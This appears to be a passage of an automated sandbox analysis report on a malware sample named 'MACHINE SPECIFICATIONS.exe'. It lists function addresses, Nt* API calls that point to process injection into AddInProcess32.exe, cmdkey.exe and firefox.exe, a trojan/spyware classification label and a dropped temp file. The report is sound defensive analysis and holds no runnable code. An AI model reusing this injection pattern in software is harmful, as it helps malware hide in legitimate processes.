Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2C30 NtMapViewOfSection,LdrInitializeThunk,	4_2_036D2C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2CF0 NtDelayExecution,LdrInitializeThunk,	4_2_036D2CF0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D4260 NtSetContextThread,	4_2_036D4260
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D4570 NtSuspendThread,	4_2_036D4570
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2B20 NtQueryInformationProcess,	4_2_036D2B20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2BE0 NtQueryVirtualMemory,	4_2_036D2BE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2AA0 NtQueryInformationFile,	4_2_036D2AA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D29D0 NtWaitForSingleObject,	4_2_036D29D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D38D0 NtGetContextThread,	4_2_036D38D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2F30 NtOpenDirectoryObject,	4_2_036D2F30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2FB0 NtSetValueKey,	4_2_036D2FB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2E00 NtQueueApcThread,	4_2_036D2E00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2EC0 NtQuerySection,	4_2_036D2EC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2ED0 NtResumeThread,	4_2_036D2ED0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2EB0 NtProtectVirtualMemory,	4_2_036D2EB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2E80 NtCreateProcessEx,	4_2_036D2E80
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2D50 NtWriteVirtualMemory,	4_2_036D2D50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2DC0 NtAdjustPrivilegesToken,	4_2_036D2DC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2DA0 NtReadVirtualMemory,	4_2_036D2DA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2C50 NtUnmapViewOfSection,	4_2_036D2C50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2C20 NtSetInformationFile,	4_2_036D2C20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D3C30 NtOpenProcessToken,	4_2_036D3C30
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2C10 NtOpenProcess,	4_2_036D2C10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D2CD0 NtEnumerateKey,	4_2_036D2CD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D3C90 NtOpenThread,	4_2_036D3C90
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BEF38 NtQueryInformationProcess,NtReadVirtualMemory,	4_2_039BEF38
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C3778 NtSuspendThread,	4_2_039C3778
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C448D NtMapViewOfSection,	4_2_039C448D
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C3468 NtSetContextThread,	4_2_039C3468
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C3A88 NtResumeThread,	4_2_039C3A88
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BF800 NtMapViewOfSection,	4_2_039BF800
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C4848 NtUnmapViewOfSection,	4_2_039C4848
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039C3D98 NtQueueApcThread,	4_2_039C3D98

Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38B3D70	0_2_00007FF6D38B3D70
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDD04	0_2_00007FF6D38BDD04
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BC474	0_2_00007FF6D38BC474
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: 0_2_00007FF6D38BDE88	0_2_00007FF6D38BDE88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00418943	1_2_00418943
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0042F053	1_2_0042F053
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00401000	1_2_00401000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004030D0	1_2_004030D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004100FA	1_2_004100FA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00410103	1_2_00410103
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_004012C0	1_2_004012C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00416B40	1_2_00416B40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00416B43	1_2_00416B43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00410323	1_2_00410323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040E323	1_2_0040E323
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040E467	1_2_0040E467
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0040E473	1_2_0040E473
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_00402780	1_2_00402780
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014E717A	1_2_014E717A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0156010E	1_2_0156010E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148F113	1_2_0148F113
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153D130	1_2_0153D130
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A51C0	1_2_014A51C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB1E0	1_2_014BB1E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154E076	1_2_0154E076
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AB0D0	1_2_014AB0D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015570F1	1_2_015570F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014D508C	1_2_014D508C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014900A0	1_2_014900A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AE310	1_2_014AE310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155F330	1_2_0155F330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01491380	1_2_01491380
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155124C	1_2_0155124C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0148D2EC	1_2_0148D2EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0156A526	1_2_0156A526
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015575C6	1_2_015575C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155F5C9	1_2_0155F5C9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A0445	1_2_014A0445
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01556757	1_2_01556757
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A2760	1_2_014A2760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AA760	1_2_014AA760
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154D646	1_2_0154D646
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C4670	1_2_014C4670
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BC600	1_2_014BC600
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153D62C	1_2_0153D62C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155A6C0	1_2_0155A6C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155F6F6	1_2_0155F6F6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149C6E0	1_2_0149C6E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015136EC	1_2_015136EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A0680	1_2_014A0680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014E59C0	1_2_014E59C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149E9A0	1_2_0149E9A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155E9A6	1_2_0155E9A6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01486868	1_2_01486868
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155F872	1_2_0155F872
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A9870	1_2_014A9870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BB870	1_2_014BB870
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A3800	1_2_014A3800
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014CE810	1_2_014CE810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01540835	1_2_01540835
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A28C0	1_2_014A28C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015518DA	1_2_015518DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015578F3	1_2_015578F3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B6882	1_2_014B6882
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_015198B2	1_2_015198B2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014DDB19	1_2_014DDB19
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A0B10	1_2_014A0B10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155FB2E	1_2_0155FB2E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01514BC0	1_2_01514BC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155EA5B	1_2_0155EA5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155CA13	1_2_0155CA13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155FA89	1_2_0155FA89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BFAA0	1_2_014BFAA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01557D4C	1_2_01557D4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A0D69	1_2_014A0D69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0149AD00	1_2_0149AD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155FD27	1_2_0155FD27
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A9DD0	1_2_014A9DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0153FDF4	1_2_0153FDF4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B2DB0	1_2_014B2DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0154EC4C	1_2_0154EC4C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A3C60	1_2_014A3C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155EC60	1_2_0155EC60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01556C69	1_2_01556C69
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01490C12	1_2_01490C12
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014AAC20	1_2_014AAC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014B8CDF	1_2_014B8CDF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014BFCE0	1_2_014BFCE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0156ACEB	1_2_0156ACEB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01539C98	1_2_01539C98
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155FF63	1_2_0155FF63
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014ACF00	1_2_014ACF00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01551FC6	1_2_01551FC6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A6FE0	1_2_014A6FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_0155EFBF	1_2_0155EFBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014E2E48	1_2_014E2E48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014C0E50	1_2_014C0E50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01540E6D	1_2_01540E6D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01559ED2	1_2_01559ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01492EE8	1_2_01492EE8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_014A1EB2	1_2_014A1EB2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: 1_2_01550EAD	1_2_01550EAD
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_00865A88	3_2_00865A88
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_00867255	3_2_00867255
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_008667D8	3_2_008667D8
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_00867714	3_2_00867714
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe	Code function: 3_2_00867373	3_2_00867373
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375F330	4_2_0375F330
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036AE310	4_2_036AE310
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03691380	4_2_03691380
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375124C	4_2_0375124C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0368D2EC	4_2_0368D2EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036E717A	4_2_036E717A
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0373D130	4_2_0373D130
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0376010E	4_2_0376010E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0368F113	4_2_0368F113
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036BB1E0	4_2_036BB1E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A51C0	4_2_036A51C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0374E076	4_2_0374E076
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037570F1	4_2_037570F1
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036AB0D0	4_2_036AB0D0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036900A0	4_2_036900A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036D508C	4_2_036D508C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A2760	4_2_036A2760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036AA760	4_2_036AA760
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03756757	4_2_03756757
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036C4670	4_2_036C4670
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0374D646	4_2_0374D646
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0373D62C	4_2_0373D62C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036BC600	4_2_036BC600
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375F6F6	4_2_0375F6F6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0369C6E0	4_2_0369C6E0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037136EC	4_2_037136EC
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375A6C0	4_2_0375A6C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A0680	4_2_036A0680
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0376A526	4_2_0376A526
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037575C6	4_2_037575C6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375F5C9	4_2_0375F5C9
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A0445	4_2_036A0445
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0370D480	4_2_0370D480
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375FB2E	4_2_0375FB2E
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036DDB19	4_2_036DDB19
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A0B10	4_2_036A0B10
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03714BC0	4_2_03714BC0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375EA5B	4_2_0375EA5B
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375CA13	4_2_0375CA13
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036BFAA0	4_2_036BFAA0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375FA89	4_2_0375FA89
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036E59C0	4_2_036E59C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0369E9A0	4_2_0369E9A0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375E9A6	4_2_0375E9A6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03686868	4_2_03686868
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03715870	4_2_03715870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375F872	4_2_0375F872
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A9870	4_2_036A9870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036BB870	4_2_036BB870
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03740835	4_2_03740835
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A3800	4_2_036A3800
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036CE810	4_2_036CE810
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037578F3	4_2_037578F3
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A28C0	4_2_036A28C0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037518DA	4_2_037518DA
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_037198B2	4_2_037198B2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036B6882	4_2_036B6882
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375FF63	4_2_0375FF63
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0371FF40	4_2_0371FF40
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036ACF00	4_2_036ACF00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A6FE0	4_2_036A6FE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03751FC6	4_2_03751FC6
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375EFBF	4_2_0375EFBF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03740E6D	4_2_03740E6D
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036E2E48	4_2_036E2E48
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036C0E50	4_2_036C0E50
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03692EE8	4_2_03692EE8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03759ED2	4_2_03759ED2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A1EB2	4_2_036A1EB2
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03750EAD	4_2_03750EAD
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A0D69	4_2_036A0D69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03757D4C	4_2_03757D4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375FD27	4_2_0375FD27
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0369AD00	4_2_0369AD00
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0373FDF4	4_2_0373FDF4
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A9DD0	4_2_036A9DD0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036B2DB0	4_2_036B2DB0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036A3C60	4_2_036A3C60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0375EC60	4_2_0375EC60
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03756C69	4_2_03756C69
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0374EC4C	4_2_0374EC4C
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036AAC20	4_2_036AAC20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0371EC20	4_2_0371EC20
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03690C12	4_2_03690C12
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036BFCE0	4_2_036BFCE0
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03727CE8	4_2_03727CE8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_0376ACEB	4_2_0376ACEB
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_036B8CDF	4_2_036B8CDF
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_03739C98	4_2_03739C98
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BEF38	4_2_039BEF38
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BE373	4_2_039BE373
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BE255	4_2_039BE255
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BD7D8	4_2_039BD7D8
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BE714	4_2_039BE714
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: 4_2_039BCA88	4_2_039BCA88
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 5_2_0000019FCC583A88	5_2_0000019FCC583A88
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 5_2_0000019FCC585255	5_2_0000019FCC585255
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 5_2_0000019FCC585714	5_2_0000019FCC585714
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 5_2_0000019FCC585373	5_2_0000019FCC585373
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 5_2_0000019FCC5847D8	5_2_0000019FCC5847D8

Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 036D5050 appears 35 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 0370E692 appears 84 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 0371EF10 appears 105 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 036E7BE4 appears 98 times
Source: C:\Windows\SysWOW64\cmdkey.exe	Code function: String function: 0368B910 appears 272 times
Source: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe	Code function: String function: 00007FF6D38B3090 appears 33 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 014D5050 appears 36 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0150E692 appears 82 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0151EF10 appears 105 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 014E7BE4 appears 88 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Code function: String function: 0148B910 appears 266 times

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/1@17/12

Source: C:\Windows\SysWOW64\cmdkey.exe

File created: C:\Users\user\AppData\Local\Temp\b427-I_1

Jump to behavior

Source: MACHINE SPECIFICATIONS.exe

